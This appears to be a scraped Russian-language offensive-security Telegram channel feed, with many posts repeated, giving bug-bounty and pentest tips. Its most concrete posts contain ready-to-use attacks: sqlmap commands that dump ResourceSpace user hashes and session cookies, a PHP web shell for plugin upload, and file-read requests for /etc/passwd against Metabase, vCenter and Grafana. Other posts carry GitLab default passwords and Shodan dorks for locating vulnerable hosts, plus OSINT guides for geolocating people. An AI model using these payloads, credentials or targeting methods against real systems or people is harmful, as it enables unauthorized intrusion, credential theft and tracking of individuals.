🎐 Находим SSRF параметры с помощью scant3r
Поиск SSRF в скрытых параметрах. Для большей эффективности можно объединить вместе с инструментами или словарям из данной статьи.
P.S. Thx @w3b_pwn
#web #ssrf
Читать статью
Поиск SSRF в скрытых параметрах. Для большей эффективности можно объединить вместе с инструментами или словарям из данной статьи.
P.S. Thx @w3b_pwn
#web #ssrf
Читать статью
Telegraph
Находим SSRF параметры с помощью scant3r
Здравствуйте, это небольшой блог о том, как найти SSRF параметры у вашей цели с помощью scant3r любым http методом и с поддержкой JSON. Требования python 3.6+ pip OAST Host (burp collaborator или interactsh.com) Установка >>> git clone https://github.com…
🔦 Быстрый и настраиваемый сканер уязвимостей для JIRA
JIRA - это коммерческая система отслеживания проблем, разработанная Atlassian, которая позволяет отслеживать ошибки и гибко управлять проектами. На днях на гитхабе появился новый сканер уязвимостей написанный на Python для JIRA, под названием Jira-Lens.
Этот инструмент выполняет более 25 проверок, включая CVE и угрозы раскрытия информации в предоставленном экземпляре JIRA.
Чтобы немного автоматизировать, можно с помощью Nuclei определить какие хосты относятся к JIRA и просканировать их все:
Ссылка на GitHub
JIRA - это коммерческая система отслеживания проблем, разработанная Atlassian, которая позволяет отслеживать ошибки и гибко управлять проектами. На днях на гитхабе появился новый сканер уязвимостей написанный на Python для JIRA, под названием Jira-Lens.
Этот инструмент выполняет более 25 проверок, включая CVE и угрозы раскрытия информации в предоставленном экземпляре JIRA.
Чтобы немного автоматизировать, можно с помощью Nuclei определить какие хосты относятся к JIRA и просканировать их все:
cat alive.domains | nuclei -c 50 -silent -t ~/nuclei-templates/exposed-panels/jira-detect.yaml | awk '{print $6}' | anew jira.domains && python3 Jira-Lens.py -f jira.domains
#web #jira #toolsСсылка на GitHub
⛓ Сбор поддоменов с помощью перестановок и комбинаций
Чтобы найти еще больше поддоменов для атаки, мы можем сгенеририровать комбинации или перестановки уже известных нам поддоменов.
В этом методе нам также нужен небольшой список слов, который содержал бы такие распространенные слова, как
Например, давайте рассмотрим поддомен
#web #recon
Чтобы найти еще больше поддоменов для атаки, мы можем сгенеририровать комбинации или перестановки уже известных нам поддоменов.
В этом методе нам также нужен небольшой список слов, который содержал бы такие распространенные слова, как
mail, internal, dev, demo, accounts, ftp, admin (похоже на брутфорс поддоменов, но требуется меньше слов). Список таких слов можно найти например здесь.Например, давайте рассмотрим поддомен
dev.example.com. Мы можем сгенерировать различные вариации перестановок этого поддомена (смотри скрин ниже) с помощью инструмента gotator:gotator -sub domains.txt -perm permutations_list.txt -depth 3 -numbers 10 | uniq > permutations.txt
Теперь, когда мы составили огромный список всех возможных поддоменов, пришло время зарезолвить их и узнать, существуют ли они на самом деле. Для этого мы будем использовать puredns:puredns resolve permutations.txt -r resolvers.txt
Где взять актуальный список резолверов я расказывал вот тут.#web #recon
👍2
🧨 История невероятного слепого удаленного выполнения кода (RCE)
Фаззинг, поиск скрытых параметров и эксплуатация слепого RCE через DNS запросы в Burp Collaborator.
#web #rce
Читать статью
Фаззинг, поиск скрытых параметров и эксплуатация слепого RCE через DNS запросы в Burp Collaborator.
#web #rce
Читать статью
Telegraph
История невероятного слепого удаленного выполнения кода (RCE)
Данная статья является переводом и ведется со слов автора. Оригинал тут. В этом блоге объясняется, как я обнаружил уязвимость слепого удаленного выполнения кода (RCE) и как она была использована. Итак, что же такое Blind RCE? Уязвимость Blind RCE возникает…
📖 Произвольное чтение файлов в Metabase (CVE-2021-41277)
Metabase - это платформа для анализа данных с открытым исходным кодом. В уязвимых версиях была обнаружена проблема безопасности с настраиваемой картой GeoJSON приводящая к LFI. Более подробно тут.
PoC:
Шаблон для Nuclei есть по ссылке. Уязвимые хосты можно поискать тут:
Дорк для Shodan
Дорк для Fofa
#web #cve
Metabase - это платформа для анализа данных с открытым исходным кодом. В уязвимых версиях была обнаружена проблема безопасности с настраиваемой картой GeoJSON приводящая к LFI. Более подробно тут.
PoC:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1Шаблон для Nuclei есть по ссылке. Уязвимые хосты можно поискать тут:
Дорк для Shodan
Дорк для Fofa
#web #cve
🏮 0day LPE в установщике Windows
Работает для всех версий установщика Windows, включая Windows 11 и Server 2022 с ноябрьским патчем.
Уязвимость была обнаружена при анализе патча для CVE-2021-41379. Мелкомягкие не смогли корректно исправить уязвимость, что в итоге привело к появлению обхода их патча.
Ссылка на эксплоит
#redteam #windows #lpe
Работает для всех версий установщика Windows, включая Windows 11 и Server 2022 с ноябрьским патчем.
Уязвимость была обнаружена при анализе патча для CVE-2021-41379. Мелкомягкие не смогли корректно исправить уязвимость, что в итоге привело к появлению обхода их патча.
Ссылка на эксплоит
#redteam #windows #lpe
🖇 Сканирование уязвимостей в Nmap с помощью NSE скриптов
Скрипты NSE Nmap позволяют не только выполнять задачи сканирования портов, но и обнаруживать CVE за считанные секунды.
Три наиболее популярных скрипта для обнаружения уязвимостей/CVE, найденных в Nmap NSE - это nmap-vulners, vulscan и vuln, которые позволят вам обнаруживать соответствующую информацию CVE на удаленных или локальных хостах.
Установка vulscan
Запуск Vuln:
Аналогичным образом используются и другие скрипты. Про все доступные в Nmap скрипты, а также про их удобный поиск я уже рассказывал ранее.
#redteam #recon #cve
Скрипты NSE Nmap позволяют не только выполнять задачи сканирования портов, но и обнаруживать CVE за считанные секунды.
Три наиболее популярных скрипта для обнаружения уязвимостей/CVE, найденных в Nmap NSE - это nmap-vulners, vulscan и vuln, которые позволят вам обнаруживать соответствующую информацию CVE на удаленных или локальных хостах.
Установка vulscan
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
Запуск vulscannmap -sV --script=vulscan/vulscan.nse www.example.com
Установка nmap-vulnerscd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
Запуск nmap-vulnersnmap --script nmap-vulners/ -sV 11.22.33.44
Запуск Vuln:
nmap -Pn --script vuln 192.168.1.105Аналогичным образом используются и другие скрипты. Про все доступные в Nmap скрипты, а также про их удобный поиск я уже рассказывал ранее.
#redteam #recon #cve
👍1
💉 Множественные уязвимости в ResourceSpace (CVE-2021-41765)
Уязвимость в ResourceSpace <=9.5 позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольные SQL-команды, что может приводить к другим уязвимостям.
Это позволяет злоумышленникам раскрыть полное содержимое базы данных, включая файлы cookie сеанса пользователей и выполнять произвольные команды на сервере.
SQLi
От SQLi до прав админа
Дампим имена, хэши паролей и куки, для получения административного доступа:
RCE
В приложении есть функция загрузки плагинов, поэтому можно загрузить плагин, содержащий веб-оболочку:
Упакуйте в
Для получения более подробной информации смотрите тут.
#web #sqli #rce
Уязвимость в ResourceSpace <=9.5 позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольные SQL-команды, что может приводить к другим уязвимостям.
Это позволяет злоумышленникам раскрыть полное содержимое базы данных, включая файлы cookie сеанса пользователей и выполнять произвольные команды на сервере.
SQLi
sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysqlОт SQLi до прав админа
Дампим имена, хэши паролей и куки, для получения административного доступа:
sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysql --dump -D resourcespace -T user -C username,password,sessionRCE
В приложении есть функция загрузки плагинов, поэтому можно загрузить плагин, содержащий веб-оболочку:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>%Упакуйте в
.tar.gz, затем переименуйте в .rspДля получения более подробной информации смотрите тут.
#web #sqli #rce
🔥1
🕸 Веб-службы на нестандартных портах
Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.
Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:
#web #recon
Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.
Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:
httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result#web #recon
💻 Управляем своим VPS через Telegram
Увидел на GitHub небольшой python скрипт, который позволяет выполнять команды на вашем сервере и получать выходные данные непосредственно в Telegram.
Это также может быть очень полезно при выполнении рекона или при выполнении длительных команд, которые требуют взаимодействия с пользователем.
Ссылка на GitHub
#bash #python #tools
Увидел на GitHub небольшой python скрипт, который позволяет выполнять команды на вашем сервере и получать выходные данные непосредственно в Telegram.
Это также может быть очень полезно при выполнении рекона или при выполнении длительных команд, которые требуют взаимодействия с пользователем.
Ссылка на GitHub
#bash #python #tools
YouTube
Automate Telegram (Acess VPS within Telegram)
Small python code which can be handy while you are using telegram and dont want to use vps again and again.
By configuring the code in your VPS,
You can execute commands and get your output within telegram.
It can also be very useful in performing Recon.…
By configuring the code in your VPS,
You can execute commands and get your output within telegram.
It can also be very useful in performing Recon.…
🕵️♂️ Отслеживание новых целей для атаки
Каждое сканирование, которое вы выполняете с помощью amass, автоматически сохраняется на компьютере, на котором вы его запустили. Затем, если вы снова запустите ту же проверку, amass будет отслеживать любые изменения, произошедшие с момента вашего последнего сканирования.
Наиболее очевидный способ использовать эту функцию-определить, какие поддомены появились с момента вашего последнего сканирования. Например, вы выполняли ранее сканирование:
#web #tools #recon
Каждое сканирование, которое вы выполняете с помощью amass, автоматически сохраняется на компьютере, на котором вы его запустили. Затем, если вы снова запустите ту же проверку, amass будет отслеживать любые изменения, произошедшие с момента вашего последнего сканирования.
Наиболее очевидный способ использовать эту функцию-определить, какие поддомены появились с момента вашего последнего сканирования. Например, вы выполняли ранее сканирование:
amass enum -d vimeo.com
Сейчас прошло несколько месяцев и если снова выполнить это сканирование, а затем прописатьamass track -d vimeo.com
то мы сможем увидеть все, что изменилось за эти месяцы. Это позволяет нам сосредоточить внимание на свежих целях, которые с большей вероятностью будут уязвимы.#web #tools #recon
💉 Взлом административной панели IBM и получение на ней SQLi
Несколько советов и хитростей по разведке в Shodan, проверка уязвимостей Broken Access Control, SQL инъекция в приложении на основе Java, а также о важности повышения воздействия от найденных уязвимостей.
#web #recon #bac #sqli
Читать статью
Несколько советов и хитростей по разведке в Shodan, проверка уязвимостей Broken Access Control, SQL инъекция в приложении на основе Java, а также о важности повышения воздействия от найденных уязвимостей.
#web #recon #bac #sqli
Читать статью
Telegraph
Взлом административной панели IBM и получение на ней SQLi
Данная статья является переводом и ведется со слов автора. Оригинал тут. Привет хакерам и хантерам! Сегодняшняя статья будет уникальной, потому что здесь я покажу вам, как мне удалось захватить административную панель IBM и получить SQL Injection, так что…
🗳 LFI, SSRF и XSS в VMware vCenter
В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.
Для поиска уязвимых хостов можно использовать однострочник:
Дорк, который можно использовать для поиска в Shodan:
Для поиска в Zoomeye:
#web #lfi #ssrf #xss
В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.
Для поиска уязвимых хостов можно использовать однострочник:
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";doneДорк, который можно использовать для поиска в Shodan:
http.title:"ID_VC_Welcome"Для поиска в Zoomeye:
app:"VMware vCenter"#web #lfi #ssrf #xss
Forwarded from Social Engineering
📚 Пентест и Хакинг: подборка лучших бесплатных курсов на YouTube.
https://youtu.be/nCmTEeb2RTc
• @codeby_sec предоставляет своим читателям,зрителям и подписчикам учебные материалы по этичному хакингу и тестированию на проникновение с Kali Linux, Windows и других операционных систем. На ютуб канале собраны отличные курсы на русском языке: https://www.youtube.com/channel/UCDiXbVs0_aUD8uKblEzEUkw/playlists
https://www.youtube.com/channel/UCQd9gYcVvNudGI8O4Lqu-dg/playlists
Ссылка на курс: https://youtu.be/3Kq1MIfTWCE
https://youtu.be/lZAoFs75_cs
https://youtu.be/TbMKwl11itQ
https://youtu.be/1hvVcEhcbLM
https://youtu.be/uIkxsBgkpj8
https://youtu.be/S6S5JF6Gou0
‼️ Дополнительную информацию ты можешь найти по хештегам #Курс и #Книга. Твой S.E.
🖖🏻 Приветствую тебя user_name.
• Это вторая подборка бесплатных курсов. Первая опубликована в нашем канале и находится по этой ссылке. Ну а сегодня будет продолжение. Небольшая подборка бесплатных курсов на любой вкус. Подробное описание можно найти под названием каждого курса, перейдя по ссылке.• Курсы по программированию на python. Этичный хакинг. — тут 123 урока. Думаю название говорит само за себя.https://youtu.be/nCmTEeb2RTc
• @codeby_sec предоставляет своим читателям,зрителям и подписчикам учебные материалы по этичному хакингу и тестированию на проникновение с Kali Linux, Windows и других операционных систем. На ютуб канале собраны отличные курсы на русском языке: https://www.youtube.com/channel/UCDiXbVs0_aUD8uKblEzEUkw/playlists
• Курс #Metasploit - программа для пентеста в дистрибутиве Kali Linux.• Полный курс по этичному взлому, от начального до продвинутого уровня.• Внедрение SQL кода.• GSM хакинг.• Следующие курсы: SQL инъекции, Kali для начинающих и курс по тестированию на проникновение.https://www.youtube.com/channel/UCQd9gYcVvNudGI8O4Lqu-dg/playlists
• Full Ethical Hacking Course - Network Penetration Testing for Beginners (2019) — курс будет полезным для начинающих пентестеров. Ранее его стримили на твиче, а сейчас он собран в одном видео на ютубе. Также, у автора есть репозиторий: https://github.com/hmaverickadams/Beginner-Network-PentestingСсылка на курс: https://youtu.be/3Kq1MIfTWCE
• Linux for Ethical Hackers (Kali Linux Tutorial) — Изучаем основы #Kali #Linux: установка, командная строка, #bash, инструменты и т.д.https://youtu.be/lZAoFs75_cs
• Create a Keylogger with Python - Tutorial — Руководство по созданию кейлоггера на языке Python.https://youtu.be/TbMKwl11itQ
• Linux Essentials for Ethical Hackers — 4х часовой курс. Все что нужно знать про Linux для пентеста и этичного хакерства.https://youtu.be/1hvVcEhcbLM
• Improve Cybersecurity Skills with CTFs — Для тех, кто любит #CTF.https://youtu.be/uIkxsBgkpj8
• Penetration Testing: Gophish Tutorial (Phishing Framework) — GoPhish — инструмент для фишинга с открытым исходным кодом, предназначенный для тестирования на проникновение. Обладает быстрой и легкой настройкой и обеспечивает легкое управление фишинговыми операциями. Курс как раз об этом инструменте. Рекомендую к просмотру и изучению.https://youtu.be/S6S5JF6Gou0
‼️ Дополнительную информацию ты можешь найти по хештегам #Курс и #Книга. Твой S.E.
📃 Списки слов для различных версий распространенных веб-приложений
Репозиторий, содержащий списки слов для различных версий распространенных веб-приложений и систем управления контентом (CMS).
Может быть полезно при фаззинге.
Ссылка на GitHub
#web #wordlist #recon
Репозиторий, содержащий списки слов для различных версий распространенных веб-приложений и систем управления контентом (CMS).
Может быть полезно при фаззинге.
Ссылка на GitHub
#web #wordlist #recon
🌩 Обход Cloudflare WAF для SQLi пэйлоада
Определение блокируемых символов и поиск слабых мест в одном из самых популярных средств защиты веб приложений.
#web #waf #sqli
Читать статью
Определение блокируемых символов и поиск слабых мест в одном из самых популярных средств защиты веб приложений.
#web #waf #sqli
Читать статью
Telegraph
Как я смог обойти Cloudflare WAF для SQLi пэйлоада
Данная статья является переводом и ведется со слов автора. Оригинал тут. Привет, хакеры и хантеры! Cloudflare привел к неудачам многих людей, которые хотели достичь критических уязвимостей, таких как: SQL injection, потому что, к сожалению, он блокирует большинство…
🔥1
🔑 Учётные данные по умолчанию в GitLab
Если вы нашли экземпляр GitLab, попробуйте войти в систему как
Имя пользователя:
Пароль:
Имя пользователя:
Пароль:
Ссылка на доку находится здесь.
Поискать экземпляры GitLab можно с помощью Shodan:
#web #
Если вы нашли экземпляр GitLab, попробуйте войти в систему как
root или admin с этими учетными:Имя пользователя:
rootПароль:
5iveL!FeИмя пользователя:
adminПароль:
5iveL!FeСсылка на доку находится здесь.
Поискать экземпляры GitLab можно с помощью Shodan:
http.title:"GitLab"#web #
🖇 Команды для доступа к страницам с кодом ответа
Коллекция списков слов, команд FFUF и шаблонов Nuclei для обхода страниц с кодом ответа
#web #fuzz
Ссылка на GitHub
403Коллекция списков слов, команд FFUF и шаблонов Nuclei для обхода страниц с кодом ответа
403 (доступ запрещён)#web #fuzz
Ссылка на GitHub
📄 Несанкционированное чтение файлов в Grafana (0day)
Похоже, что новый 0day LFI в Grafana существует благодаря плагину
Тем временем, найти Grafana можно с помощью дорка для ZoomEye:
Или в Shodan:
—————————
UPD:
Работает и через другие плагины в
#web #lfi #0day
Похоже, что новый 0day LFI в Grafana существует благодаря плагину
grafana-clock-panel. Достаточно отправить GET запрос вида:GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwdТем временем, найти Grafana можно с помощью дорка для ZoomEye:
app:"Grafana"Или в Shodan:
Grafana—————————
UPD:
Работает и через другие плагины в
/public/plugins/*#web #lfi #0day
🇪🇺 Списки слов для фаззинга сайтов на разных языках
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
▫️ Infosec Wordlists
▫️ Dirbuster Spanish
▫️ Bip Spanish
▫️ Türkçe Wordlist
▫️ krypt0n wordlists
▫️ Combined-Wordlists
▫️ Common Web Managers Fuzz Wordlists
▫️ Cracking French passwords
#web #fuzz #wordlist
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
▫️ Infosec Wordlists
▫️ Dirbuster Spanish
▫️ Bip Spanish
▫️ Türkçe Wordlist
▫️ krypt0n wordlists
▫️ Combined-Wordlists
▫️ Common Web Managers Fuzz Wordlists
▫️ Cracking French passwords
#web #fuzz #wordlist
Forwarded from Social Engineering
🔎 OSINT. Поиск геолокации нашей цели.
• Сегодня я поделюсь с тобой подборкой статей, с помощью которых ты научишься определять геолокацию цели, будь то человек или другой объект. Это очень полезный материал для специалистов в области #OSINT и Социальных Инженеров:
• Определение местоположения по фотографии.
• Определение местоположения по фотографии. Обратный поиск изображений.
• Используем тень для определения местоположения военной базы США.
• Извлечь, исследовать, проверить.
• Как природа может раскрывать секреты геолокации.
• GeoTips: советы по поиску геолокации в странах мира.
Перевод статей от @cybred:
• Определяем дату сделанного снимка.
• Как определить геолокацию фотографии по отражению в стекле.
• Как определить местоположение по фотографиям, сделанным на природе.
• Используем Солнце и тени для определения геолокации по фотографии.
Инструменты:
• Набор погодных карт.
• Поиск информации о погоде в разное время по городу, почтовому индексу или коду аэропорта.
• Спутниковые снимки, аэрофотоснимки, снимки с беспилотников и многое другое.
• Необычный сервис для поиска кратчайшего маршрута от точки А до точки Б.
• Карта для отслеживания самолетов в реальном времени.
• Онлайн транспортир.
• Полное руководство по OSINT с использованием Maltego.
• Что такое Maltego и зачем оно вообще нужно;
• Интерфейс и базовое устройство;
• Maltego и OSINT в Facebook;
• Maltego и OSINT в ВК, Instagram, LinkedIN и других соцсетях;
• Применение системы распознавания лиц для OSINT в Maltego;
• Поиск информации с применением геолокации.
‼️ Дополнительную информацию ты можешь найти по хештегам #OSINT и #СИ. Твой S.E.
🖖🏻 Приветствую тебя user_name.• Многие популярные социальные сети, мессенджеры, сервисы, заботятся о том, что бы при загрузке любых файлов, из них удалялись метаданные. И когда ты планируешь скачать фотографию или видео того или иного человека \ объекта, то ты можешь не обнаружить там никакой полезной информации.
• Сегодня я поделюсь с тобой подборкой статей, с помощью которых ты научишься определять геолокацию цели, будь то человек или другой объект. Это очень полезный материал для специалистов в области #OSINT и Социальных Инженеров:
• Определение местоположения по фотографии.
• Определение местоположения по фотографии. Обратный поиск изображений.
• Используем тень для определения местоположения военной базы США.
• Извлечь, исследовать, проверить.
• Как природа может раскрывать секреты геолокации.
• GeoTips: советы по поиску геолокации в странах мира.
Перевод статей от @cybred:
• Определяем дату сделанного снимка.
• Как определить геолокацию фотографии по отражению в стекле.
• Как определить местоположение по фотографиям, сделанным на природе.
• Используем Солнце и тени для определения геолокации по фотографии.
Инструменты:
• Набор погодных карт.
• Поиск информации о погоде в разное время по городу, почтовому индексу или коду аэропорта.
• Спутниковые снимки, аэрофотоснимки, снимки с беспилотников и многое другое.
• Необычный сервис для поиска кратчайшего маршрута от точки А до точки Б.
• Карта для отслеживания самолетов в реальном времени.
• Онлайн транспортир.
• Полное руководство по OSINT с использованием Maltego.
• Что такое Maltego и зачем оно вообще нужно;
• Интерфейс и базовое устройство;
• Maltego и OSINT в Facebook;
• Maltego и OSINT в ВК, Instagram, LinkedIN и других соцсетях;
• Применение системы распознавания лиц для OSINT в Maltego;
• Поиск информации с применением геолокации.
‼️ Дополнительную информацию ты можешь найти по хештегам #OSINT и #СИ. Твой S.E.